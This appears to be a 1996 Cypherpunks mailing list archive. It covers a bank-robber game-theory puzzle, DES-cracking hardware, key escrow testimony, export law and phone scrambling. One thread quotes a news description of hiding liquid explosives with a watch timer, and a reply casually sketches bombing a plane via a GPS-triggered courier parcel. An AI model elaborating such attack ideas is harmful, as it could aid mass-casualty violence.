>suggests how to split the money. Then they vote on his suggestion. If
>50% or more vote for his proposal, his suggestion is adopted.
>
>Otherwise they kill the  first robber and now it is the turn of guy #2
>to make another splitting proposal. Same voting rules apply.
>
>The question is, what will be the outcome? How will they split the
>money, how many robbers will be dead, and so on?
>
>igor

This is a variant on the normal distribution problem/game where you have a
number of homogeneous/identical items that are either too numerous to
distribute by the "one for you and one for me" method or are not equivalent
to each other. The "goal" is to have a method of distributing so that each
person feels that they got "their fair share". The classic solution is to
have #1 divide the items into 20 piles (any of which he is willing to take
as his share). Then number #2 is offered the choice of accepting #1's
distribution or rearranging the distribution until he is happy to accept
any of them. This accept/rearrange process goes on until #19 has made his
decision. Then #20 is allowed to select any one pile as his share. The
"choose a pile" option then goes back up the line (to #19, #18, etc) with
each taking one of the remaining piles until it gets to whoever was before
the person who did the last rearrangement. This person then has the option
of doing a new rearrangement or approving the current distribution. After
he does a rearrangement or approves the distribution, the option keeps
going up the line until it gets to #1 (who selects a pile). You then keep
going down [and up] the line until there are only two piles and the last
approver/rearranger gets the last pile after the choice of piles is made by
the other person.

This is "fair" since at all times the person who is making a pile selection
has already approved the distribution (or at the end is offered his choice
of the two remaining piles).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Sat, 27 Jul 1996 15:12:34 +0800
To: ichudov@algebra.com (Igor Chudov)
Subject: Re: Twenty Bank Robbers -- Game theory:)
In-Reply-To: <199607251409.JAA16978@galaxy.galstar.com>
Message-ID: <v03007802ae1ea90d0644@[166.84.220.80]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:09 -0500 7/25/96, Igor Chudov wrote:


>Here's a puzzle for our game theorists.
>
>Twenty cypherpunks robbed a bank. They took 20 million bucks. Here's
>how they plan to split the money: they stay in line, and the first guy
>suggests how to split the money. Then they vote on his suggestion. If
>50% or more vote for his proposal, his suggestion is adopted.
>
>Otherwise they kill the  first robber and now it is the turn of guy #2
>to make another splitting proposal. Same voting rules apply.
>
>The question is, what will be the outcome? How will they split the
>money, how many robbers will be dead, and so on?
>
>igor

I've read the differing scenarios and they seem to fall into two groups -
Either #1 makes an offer good enough to get 9 others to vote for it (and
thus save his life) or there is a blood bath ending with #19 getting all
the money and #20 with nothing but his life.

I think that if the blood bath occurs it will not get to the 2 survivor
stage. I think it will end at the 4 (or possibly 3) survivor stage. I base
this analysis on #20's best outcomes and interests. He will survive no
matter what (assuming that we ignore the cases where those who do not get
their fair share wack those who got money and take it) so this is not an
issue for him (he has no way of being killed for being too greedy). The
amount of money that he will get is totally dependent on what the current
"split proposer" offers him as an incentive to vote for the split (as
noted, once #19 gets to the top of the queue, he can [will?] grab
everything and cut out #20 so it is in #20's financial interest to vote for
a prior robber who will offer him some of the money). Since the vote must
be 50% or better for the proposed split, once it is #17's chance (ie: When
we are down to only 4 robbers and 2 yes votes will "win"), he can get #20's
vote by offering him at least 50% of the money (more than 50% will be an
incentive to #20 to take the deal since if he goes thumbs down to a 50/50
split with #17, #18 will only need to offer #20 the same 50/50 deal ["its
then 50% or nothing"] after #17 gets killed). #17 can hedge his bet by
offering #18 some of the rest (assuming a secret vote or all voting at the
same time in ignorance of how the other voted) since it might gain his vote
(a split between 17&20 leaves #18 out in the cold so he might go for some
money as opposed to none [in the case where #20 goes for 17&20 split]).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Fri, 26 Jul 1996 22:24:12 +0800
To: cypherpunks@toad.com
Subject: Re: Distributed DES crack
Message-ID: <9607261128.AA17859@srzts100.alcatel.ch>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Fri Jul 26 13:25:22 1996
> At 10:30 7/23/96, Matt Blaze wrote:
> 
> >My estimate is that an FPGA-based machine that can do a single DES key
> >every four months (eight months to exhaust the whole keyspace) could
> >be built with off-the-shelf stuff for comfortably under $50k (plus
> >labor, plus software development costs).  A prototype board should
>  cost
> >under $1000 and will help prove the concept and get a more accurate
>  cost
> >estimate.  I expect to build such a prototype machine myself, and, if
>  it
> >works as I expect, maybe the whole thing.
> 
> I am willing to financially contribute to the project.
> 
> 
If this were to be a card (via RS232 or PC-bus), thousands of people would 
be able to copy it, once the development process is finished. -> You'd have 
hardware that all those people could use for a distributed crack, the 
building cost would be distributed also (<$100), only development would 
have to be at one place (sponsored of course). Now, that would be a scary 
thought for DES-fans!

- --------< fate favors the prepared mind >--------
Remo Pini                            rp@rpini.com
PGP:  http://www.rpini.com/remopini/rpcrypto.html
- ------< words are what reality is made of >------
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMfirIxFhy5sz+bTpAQEpQggAsgkbxVgxbKSSMrCT/gjBvmagHhl0KWqd
9rtbRcp8D2jKXYQ1f7yVWsvD/UEWV4hKpZtUOLKk90HrnL96N+QERUsx55ojqHxQ
VzOInVjEexlM+mIYcP+IYCmMtM05o7GcVJTFjmT9GrpNWSVrA0szwJnROLkkkJ9b
JV8+QSKusYX+Xy5BBpBEmyb6036+zgurZuGll6+A0hks5azGnRlbcYMgQhQ1ToKn
/TqeFSCxwPCMSrfnhtfMeyCCa0z7ysue36kXhZaSHbgw2Zm+ejaB4/lINjultl33
iE7IqcE3Q824itorCmak3PM3CslTOG6iOszRSL70JD8t0ddjt4c/UA==
=+ipg
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Sat, 27 Jul 1996 07:52:20 +0800
To: "Declan B. McCullagh" <cypherpunks@toad.com
Subject: Re: Freeh Testimony 7/25/96
In-Reply-To: <v03007804ae1e2226c5ed@[192.187.162.15]>
Message-ID: <v03007806ae1edadfc391@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:55 AM -0700 7/26/96, Declan B. McCullagh wrote:
>David's comments bring more heat than light.
>
>Freeh's statements were not distributed to senators before the hearing,
>so they couldn't have read his prepared statement.
>
>Further, he wandered considerably from his prepared statement at the
>hearing. I wonder why David is talking about what Freeh addressed in his
>statement, instead of what he actually said.

Because that's what Banisar pointed us to in his message. Had he qualified
his own post of Freeh's opening statement I might have reacted differently.

This increases the odds on "sloppy" rather than "mendacious".

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Sat, 27 Jul 1996 07:58:23 +0800
To: Hal <cypherpunks@toad.com
Subject: Re: Twenty Bank Robbers -- CLARIFICATION
In-Reply-To: <199607251813.NAA02650@galaxy.galstar.com>
Message-ID: <v03007807ae1edd0a4623@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:59 AM -0700 7/26/96, Hal wrote:
>First, the line is established before the proposals begin.  So the
>proposer is not determined by lot, everyone knows who will be #1, #2,
>etc.  Second, I think the proposer gets to vote.  The wording is a bit
>ambiguous, but it just says that "they" vote, and I think "they" pretty
>clearly refers to the whole group.
>
>Now here is the solution for two people:
>
>#1 (first in line) proposes that he gets it all.  #1 votes yes, #2 votes
>no.  The proposal passes.
>
>Here it is for three people:
>
>#1 (first in line) proposes that he gets it all.  #1 votes yes, #2
>probably votes no (since he will get it all if the proposal fails, by
>the above) and #3 (end of line) reasons like this: if the proposal
>fails, he (#3) will get nothing because #2 will get it all.  Therefore
>voting yes or no makes no difference to whether #3 stays alive (his
>first priority) or how much money he makes (his second priority).  But
>it does make a difference in terms of keeping as many people alive as
>possible (his third priority).  So he votes yes because of this third
>reason.  Therefore the proposal passes and the first person in line
>gets it all in this case.
>
>Of course, #1 could have offered some money to #3 and gotten his vote,
>but that would violate the terms of the problem: #1 wants to make as
>much money as possible.  And since he can get #3's vote even while
>offering nothing to him, that is what he will do.

But Hal, these are Cypherpunks, which means some of them are smart and some
are uh, er, um, not so smart. I would not want to be first in line.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjn@nworks.com
Date: Sat, 27 Jul 1996 06:01:16 +0800
To: cypherpunks@toad.com
Subject: Re: Question
Message-ID: <TCPSMTP.16.7.26.13.41.44.2645935021.656413@.nworks.com>
MIME-Version: 1.0
Content-Type: text/plain


 In> On Mon, 4 Sep 1989, Damien Lucifer wrote:
 
 > 
 > On Tue, 23 Jul 1996 pjn@nworks.com wrote:
 > 
 > > OK...A question for you all:
 > > 
 <snip>

 In> Man, this is strange.  I think C'punks just got time warped by Agents
 In> of the Evil Empire or somethin'.  pjn wrote on 23 July 96, but Damien
 In> Lucifer replied to it on 4 Sep, 1989!  Wow!  Somebody better call
 In> Special Agent Mulder.

 In> <insert X files theme music here>

 Hahaha...

 (Honestly, Im a Invader from Outerspace. We time travel.)


 P.J.
 pjn@nworks.com

 


... Resistance is futon.  Borgie go nap-nap now.

___ Blue Wave/QWK v2.20 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjn@nworks.com
Date: Sat, 27 Jul 1996 06:02:17 +0800
To: cypherpunks@toad.com
Subject: New Book
Message-ID: <TCPSMTP.16.7.26.13.41.56.2645935021.656415@.nworks.com>
MIME-Version: 1.0
Content-Type: text/plain


Hey all-

 I was in the local Barnes and Noble Bookstore and I saw a book that
 looked interesting.  It is called The Ultimate Spy Book written by
 H. Keith Melton and it contains a large wealth of information about
 the writing and breaking of cyphers from the time of Queen Elizabeth
 to the NSA.  It is about $30, but it is well worth it...


 P.J.
 pjn@nworks.com



... etc etc etc etc

___ Blue Wave/QWK v2.20 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 27 Jul 1996 06:51:08 +0800
To: mpd@netcom.com (Mike Duvos)
Subject: Re: IP: NSA RESPONSE TO KEY LENGTH REPORT
In-Reply-To: <199607260642.XAA14728@netcom23.netcom.com>
Message-ID: <199607261744.NAA23409@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Mike Duvos writes:
> Matt Blaze <mab@research.att.com> writes:
>  > Finally, the NSA report offers estimates of the time
>  > required to perform exhaustive search using a Cray model T3D
>  > supercomputer.  This is a curious choice, for as our report
>  > notes, general-purpose supercomputers of this type make poor
>  > (and uneconomical) key search engines.
> 
> A tiny nit to pick here.  The Cray T3D and T3E computers are
> massively parallel machines consisting of DEC Alpha chips hooked
> up in a 3D Torus configuration.  They would probably make pretty
> decent key search engines,

Not compared to programmable logic devices, they wouldn't...

And that is, after all, the point...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Sat, 27 Jul 1996 08:30:24 +0800
To: cypherpunks@toad.com
Subject: Re: TIM_ers
In-Reply-To: <199607261449.OAA25194@pipe2.t2.usa.pipeline.com>
Message-ID: <v03007808ae1eddb06d12@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:49 AM -0700 7/26/96, John Young wrote:
>   7-21-96. Sunday WaPo:
>
>   "Liquid Explosives, Miniature Timers May Foil Airline
>   Security Measures."
>
>      1994 spelled the beginning of what some experts fear
>      might be a resurgence of hi-tech terrorism, this time
>      involving persons with more advanced bomb-making skills
>      who know how to defeat even the best airport security
>      devices. The new terrorists favor smaller and much less
>      detectable plastic or liquid explosives detonated by
>      miniaturized and benign looking timers.
>
>      At the heart of such devices is a timer built by
>      rewiring a commonly available Casio digital watch, which
>      is connected to a stabilized form of liquid
>      nitroglycerin stored in a bottle ostensibly filled with
>      contact lens solution. The stabilizer for the
>      nitroglycerin looks like unsuspicious cotton. Even newer
>      screening devices that can see through clothes would
>      have difficulty ferreting out such a substance,
>      according to airplane security experts.
>

If so, we can't stop such people at the airport, and we are thrown back on
intelligence, and going after terrorist support networks and
terrorist-supporting States, a la Netanyahu.

Like key escrow, fancy airport detection schemes will spot the dunce
terrorists (which helps), but to get the sophisticated ones, much more is
needed.

By the way, one of Freeh's points is that even if terrorists communicate
with each other using what Freeh hopes will become illegal or seldom-used
crypto, they have to communicate with lots of others not in on the
conspiracy (banks, etc.) and if all legal crypto is escrowed either by
common practice or by law, they can be gotten at that way.

Perhaps Freeh is hinting at sources and methods for some of the
government's successes, rather than presenting idle speculation.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 27 Jul 1996 06:46:51 +0800
To: mpd@netcom.com (Mike Duvos)
Subject: Re: IP: NSA RESPONSE TO KEY LENGTH REPORT
In-Reply-To: <199607261753.KAA12891@netcom13.netcom.com>
Message-ID: <199607261814.OAA23478@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Mike Duvos writes:
> > > A tiny nit to pick here.  The Cray T3D and T3E computers are
> > > massively parallel machines consisting of DEC Alpha chips hooked
> > > up in a 3D Torus configuration.  They would probably make pretty
> > > decent key search engines,
> > 
> > Not compared to programmable logic devices, they wouldn't...
> > 
> > And that is, after all, the point...
> 
> My point was that the T3D is not a "general-purpose supercomputer."

Well, thats moot -- it isn't a special purpose keysearch machine, and
thats whats really needed. Alpha's don't cut it...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Fri, 26 Jul 1996 23:09:05 +0800
To: cypherpunks@toad.com
Subject: NOT noise!  Serious cypherpunkly work afoot
Message-ID: <199607261224.OAA05075@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Anybody have a Nextstep box with gcc and gnumake that I can borrow
some CPU cycles from?


Thanks!


Bryce

Ecash 2.x Team




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMfi4yUjbHy8sKZitAQFAlAMA0yfFER9v3N9sYezA/Kt8oT7DeIX9NY1d
nn2B3ErsG4O7RXvmHvbtSG7raysqP5VCGQKstdUuufAVR50XQZQeQaV5RAh9dJkw
bGSsVdJwnpJUwzZKe8cKq2j3FcRRgqpJ
=2Qj6
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 27 Jul 1996 06:39:58 +0800
To: pjn@nworks.com
Subject: Re: New Book
In-Reply-To: <TCPSMTP.16.7.26.13.41.56.2645935021.656415@.nworks.com>
Message-ID: <199607261825.OAA23533@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



pjn@nworks.com writes:
>  I was in the local Barnes and Noble Bookstore and I saw a book that
>  looked interesting.  It is called The Ultimate Spy Book written by
>  H. Keith Melton and it contains a large wealth of information about
>  the writing and breaking of cyphers from the time of Queen Elizabeth
>  to the NSA.  It is about $30, but it is well worth it...

The canonical text on the subject remains "The Codebreakers", a book
which literally changed history given that Whit Diffie got interested
in crypto because of it. Sparked my interest and that of many others, too...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wayne H. Allen" <whallen@capitalnet.com>
Date: Sat, 27 Jul 1996 07:48:11 +0800
To: cypherpunks@toad.com
Subject: Re: TIM_ers
Message-ID: <199607261849.OAA03749@ginger.capitalnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 14:49 96.07.26 GMT, John Young wrote:
>   7-21-96. Sunday WaPo: 
> 
>   "Liquid Explosives, Miniature Timers May Foil Airline 
>   Security Measures." 
> 
>
>      At the heart of such devices is a timer built by 
>      rewiring a commonly available Casio digital watch, which 
>      is connected to a stabilized form of liquid 
>      nitroglycerin stored in a bottle ostensibly filled with 
>      contact lens solution. The stabilizer for the 
>      nitroglycerin looks like unsuspicious cotton. Even newer 
>      screening devices that can see through clothes would 
>      have difficulty ferreting out such a substance, 
>      according to airplane security experts. 

    "See through cloths", wasn't there an ad in the back of comic books
for a pair of sunglasses that did the same thing. And did these same
sources mention how a bottle of lens solution with wired up Casio watch
attached to it would not be considered conspicuous? If you want to bring
down a plane just go to the courier services at the office blocks with
a parcel for across the country, us a gps reciever with preset co-ordinates
and when the plane gets there, ooopppss. If you want high tech thats the way
to go.
Wayne H.Allen
whallen@capitalnet.com
Pgp key at www.capitalnet.com/~whallen





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sat, 27 Jul 1996 01:39:26 +0800
To: cypherpunks@toad.com
Subject: TIM_ers
Message-ID: <199607261449.OAA25194@pipe2.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   7-21-96. Sunday WaPo: 
 
   "Liquid Explosives, Miniature Timers May Foil Airline 
   Security Measures." 
 
      1994 spelled the beginning of what some experts fear 
      might be a resurgence of hi-tech terrorism, this time 
      involving persons with more advanced bomb-making skills 
      who know how to defeat even the best airport security 
      devices. The new terrorists favor smaller and much less 
      detectable plastic or liquid explosives detonated by 
      miniaturized and benign looking timers.  
 
      At the heart of such devices is a timer built by 
      rewiring a commonly available Casio digital watch, which 
      is connected to a stabilized form of liquid 
      nitroglycerin stored in a bottle ostensibly filled with 
      contact lens solution. The stabilizer for the 
      nitroglycerin looks like unsuspicious cotton. Even newer 
      screening devices that can see through clothes would 
      have difficulty ferreting out such a substance, 
      according to airplane security experts. 
 
   ----- 
 
   http://jya.com/timers.txt 
 
   TIM_ers 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Sat, 27 Jul 1996 01:42:50 +0800
To: Remo Pini <rp@rpini.com>
Subject: Re: Am I protected by ignorance?
In-Reply-To: <9607260929.AA14439@srzts100.alcatel.ch>
Message-ID: <Pine.BSF.3.91.960726144704.2255B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain


Your "ignorance" - Gee, I didn't know the server was in the US!

or theirs?

It would be fairly easy to figure out that the server was probably in the 
US, by tracing the route, watching the amount of delay between hops over 
time, etc.

If the server was discovered, I don't think your claim of ignorance as to 
its location would be much of a defence. OTOH, IANAL.


On Fri, 26 Jul 1996, Remo Pini wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> To: cypherpunks@toad.com
> Date: Fri Jul 26 11:26:59 1996
> I have a question about legal issues:
> 
> Lets asume I have a service provider in switzerland who gives me web-space.
> I publish strong cryptography there. The server itself is physically in 
> USA, but my domain is something like "www.itar.ch" (a swiss web-address). 
> Since there is no way for me to know where the server stands, do I violate 
> the ITAR, and if so, am I realistically prosecutable?
> 
> 
> - --------< fate favors the prepared mind >--------
> Remo Pini                            rp@rpini.com
> PGP:  http://www.rpini.com/remopini/rpcrypto.html
> - ------< words are what reality is made of >------
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.3i
> Charset: noconv
> 
> iQEVAwUBMfiPZBFhy5sz+bTpAQHbKggAi7kG/Bp8x+fApJTTSDw6AAcXe+U5TyVG
> ladtDvnQOQE66raEqvfTWUPuyB5Fa9xqRAe/kpSkxU7802TPMnxMii3dJPLaOMv7
> eYZx58VVVeSmbnC3qnN4SU5uSYnS7dNXE50kPaZDq0bap3O2LVB0yTL30xqBuF5+
> EJs73dJQRKt/UipbymTLmeThDM1bRj0CxRL5b1OHHoYM5yDMhpxrS5KWnke7Pxqe
> lTM3K+XTdpLC3MgmD15hpAfpn82uYGm8a21EsJ/ODLdxrdEv7mRm36V7EYH+JAqM
> 9jM3Hy38vnGHk6inB2dLGofa5tzFdbEhW2TtL6chRAnmemQkmVN8jg==
> =eWJb
> -----END PGP SIGNATURE-----
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Sat, 27 Jul 1996 14:54:00 +0800
To: John Deters <jad@dsddhc.com>
Subject: Re: Twenty Bank Robbers -- solution (?)
In-Reply-To: <2.2.32.19960725223251.00e8eea8@labg30>
Message-ID: <v03007804ae1ec7950c78@[166.84.220.80]>
MIME-Version: 1.0
Content-Type: text/plain


At 17:32 -0500 7/25/96, John Deters wrote:


>At 01:13 PM 7/25/96 -0500, Igor Chudov wrote:
>>Igor Chudov wrote:
>>>
>>> Here's a puzzle for our game theorists.
>>
>>I forgot to say what the GOALS are. The goals of every individual
>>cypherpunk are (in from highest to lowest priority):
>>
>>1. Stay alive
>>2. Get as much money as possible
>>3. Keep as many cypherpunks alive as possible, all other things being equal.
>
>The first cypherpunk should propose a 10-way split:  #s 11-20.  It's the
>best offer #s 10-18 will be assured of getting without having to kill
>anyone.  Once any one dies, I think the results will always boil down to #19
>getting 100% of the money (when #s 1-18 are dead, #19 proposes that #19 gets
>100% of the money and his vote is 50%, so he "wins".  #20 kills him out of
>spite and takes it all anyway, though.  No honor amongst thieves.)

As I noted in a separate message, I think that if the killing starts it
will not necessarily go as far as you propose. Since, when it is #17's
change, all he needs is one extra vote, he can offer to split with #20
(who, as you note, will get nothing from #19 - so it is in his interest to
accept any offer from #17 that is for at least 50% [anything less he
should/could reject since #18 will/should offer him at least 50% to prevent
#18 getting killed]).

Also, I question WHO #1 should offer the split to. All he wants is 9 extra
votes so it does not need to be #11-20. I'd think that #1-10 (if #1 wants
part of the money) or #2-11 (if he does not but wants to hedge his bet by
allowing for one "No" vote from that group) would be better since by voting
"YES", each gets to not need to worry about coming up with a split or
risking death (11-20 do not have this type of immediate threat hanging over
their heads so they are more likely to vote "NO" and hope for a better deal
[as the first ones start dropping dead, there are less votes needed so the
"I'll Bribe you with part of the Split" offers are going to be worth more
to those who are included]).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bovine Remailer <haystack@cow.net>
Date: Sat, 27 Jul 1996 06:47:38 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <9607261856.AA07442@cow.net>
MIME-Version: 1.0
Content-Type: text/plain


Here is an interesting news article from CNN concerning cryptography and export regulations in the US.

http://www.cnn.com/TECH/9607/25/electronic.security.wir/index.html





--
Tangent <tangent@deltanet.com>
PGP key available on MIT PGP public keyserver. Key ID: BA8010B1




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Sat, 27 Jul 1996 07:48:23 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: Freeh Testimony 7/25/96
In-Reply-To: <olyCdry00YUw0E77M0@andrew.cmu.edu>
Message-ID: <199607261908.PAA21017@nrk.com>
MIME-Version: 1.0
Content-Type: text


> Freeh's statements were not distributed to senators before the hearing,
> so they couldn't have read his prepared statement.
> 
> Further, he wandered considerably from his prepared statement at the
> hearing. I wonder why David is talking about what Freeh addressed in his
> statement, instead of what he actually said.

Further, the more interesting aspects were what Freeh said under
interactive questioning by the Senators. He artfully avoided
many of their direct questions, but found himself on the rocks
on others.

He seemed rather surprised at the tenor & thrust of the questioning;
He could not have thought this would be a cake-walk but he sure
acted that way.

The transcript will be interesting reading.


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Sat, 27 Jul 1996 00:30:57 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymous Web Services Inc.
Message-ID: <9607261333.AA21798@srzts100.alcatel.ch>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Fri Jul 26 15:30:18 1996
I went to that page.

It's lousy and useless. If you follow the adresses in the source, you end 
up at "Aristocratic Advertising Administration", which belongs to this guy:

floeter@sendit.nodak.edu  and
floeter@www.hillsboro.k12.nd.us
http://134.129.18.248/~floeter/

and he as a collegue at

bladow@sendit.nodak.edu and
HREF="http://134.129.18.248/~bladow/inex.htm

I guess those two just want to be cool (what a pity).


- --------< fate favors the prepared mind >--------
Remo Pini                            rp@rpini.com
PGP:  http://www.rpini.com/remopini/rpcrypto.html
- ------< words are what reality is made of >------
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMfjIaxFhy5sz+bTpAQG/3Qf8DCOB0S0Z8YKIDfU3Cz3pOPemW9l48Dfm
5G3eOhEQ2zE7y6K/piyT8pef3U8N4ri7pC9BhmGgMbJdF8s/SYUNhjF2uTS4eSR8
NI4hfeibWNMZ8msbkG6cvn5RtzexyMwAN5K8wCa6+WKynBWWSAwtpx7zRs/9fcxZ
/qaOYfOByikkecCi83W4Uqc/s2HB21YspOswPjv++vpJZHyXb2BVu7ke1fhBatfV
85GDL4YdG3KjdEr2vErtEeLZnLpkpGWoYKngUOByIVc0ib3lmupLsqveZrjXiR74
aweKoSIHSALwyVje7IC7L9VEsuISJuG+n+riZLb56KyjUFFlvvQY7A==
=tRWT
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 27 Jul 1996 09:23:47 +0800
To: cypherpunks@toad.com
Subject: Usenet Conference on Security
Message-ID: <199607262252.PAA03209@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Just a few of the highlights:

(1) Ron Rivest speaking on SDSI
(2) Ian Goldberg et.al's secure environment for running untrusted programs
in Solaris.  Since it runs Netscape, it may let Perry provide a second
layer of containment for Java.
(3) Carl Ellison's "Establishing Identity Without Certification Authorities
(4) Peter Gutmann's "Secure Deletion of Data from Magnetic and Solid-State
Memory".  (Bottom line, use thermite for magnetic media.)
(5) Don Davis's "Compliance Defects in Public Key Cryptography"
(6) Sameer Parekh's description (advertisement for) Community Connexion
(7) Derek Atkins' description of the PGP Library API.

Other amusements:

While the Department of Justice guy (whose name slips my mind) was saying 4
horsemen over and over (really an oversimplification of his position), Data
Fellows Ltd., Paivantaite 8, FIN-02210 ESPOO, Finland
(http://www.datafellows.com) was in the vendor area offering strong crypto
products with the line in one of their handouts, "This is orders of
magnitude more security than DES-based or US products that are under the US
ITAR export restrictions."  In talking with them I didn't smell any snake
oil.

A BOF on PKI with Ron Rivest (who had already described SDSI) where Matt
Blase describing PoliceMaker, and Carl Ellison described SPKI.  All three
approaches get away from the central certificate hierarchy God.  Each one
has something to offer that the other do not.  (In a spirit of
advertising/disclosure, I have been working with Carl on SPKI.)


-------------------------------------------------------------------------
Bill Frantz       | Cave ab homine unius lebri | Periwinkle -- Consulting
(408)356-8506     |  [Beware the man of one    | 16345 Englewood Ave.
frantz@netcom.com |   book]  - Anonymous Latin | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Sat, 27 Jul 1996 09:26:16 +0800
To: jkenth@c2.org (J. Kent Hastings)
Subject: Re: Anonymous Web Services Inc.
In-Reply-To: <Pine.SUN.3.94.960726112523.12838c-100000@infinity.c2.net>
Message-ID: <199607262255.PAA22798@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


J. Kent Hastings writes:
> 
> Deranged and cpunx,
> 
> I figure the digicrime site for provocateurs.
> Ignore them and they'll go away, or what?


Um guys, it's a joke.  Check out the rest of the digicrime home page.
Last time I looked at it it was pretty funny, and quite obvious to
even a paranoid security weenie like me.


-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Sat, 27 Jul 1996 09:21:48 +0800
To: bqm1808@is.nyu.edu (Brendon Macaraeg)
Subject: Re: "privatizing" phones?
In-Reply-To: <1.5.4.32.19960726085331.0067db88@is.nyu.edu>
Message-ID: <199607262311.QAA22874@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


Brendon Macaraeg writes:
> 
> Cpunks:
> 
> While shopping for a new phone recently, I came across
> two models (Toshiba and Uniden I believe) that
> have buttons to "privatize" you conversations. These
> were on no-cord models.

I have one of these, a Panasonic "Secure Guard" cordless.
It was on sale, I couldn't resist. :-)

It's a 46mhz analog model, newer phones use frequencies
in the 900mhz range and/or digital encoding.
The 900mhz range is one of those 'blocked' in most newer radio
scanners, this is required by law as of a few years ago.
Many scanners can have some or all of the locked-out
ranges restored by suitable modification (i.e. removing
a resistor).  Many of these mods are posted on the net.

> Does anyone have any idea
> on what these actually do? Can the phones  change
>  the frequency the call is on randomly
> so people can't tune into it?

The Panasonic I have doesn't change frequencies during the call
by itself, although you can do that by pressing a button.  The
"secure" feature does some sort of analog frequency-diddling
to make most of the sound transmitted between the phone and base unit
unintelligable.  I'm not a hardware type but I expect that
this isn't very hard to 'crack' given a bit of equipment.
I'm sure most HAM hobbiests could do so.   It only keeps your
conversations somewhat safe from the local snoops with scanners.

While most speech comes out pretty good, you can't have the 'secure'
feature on when you're attempting to navgate phonemail systems... it messes
up the DTMF tones just enough to make then unrecognizable to
many phonemail systems.

> I know cellulars offer something similar. 

Yea, that's more secure although if I remember right, nowhere
near unbreakable.  Why, then drug dealers and terrorists could
make phone calls and our great and wonderful law enforcement personell
would not be able to listen in on the perps.  Wouldn't want that
now, would we?

> Personally, I would never put much faith into
> something of this sort. 

Well, it's not "secure" but it's somewhat better than nothing.



-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




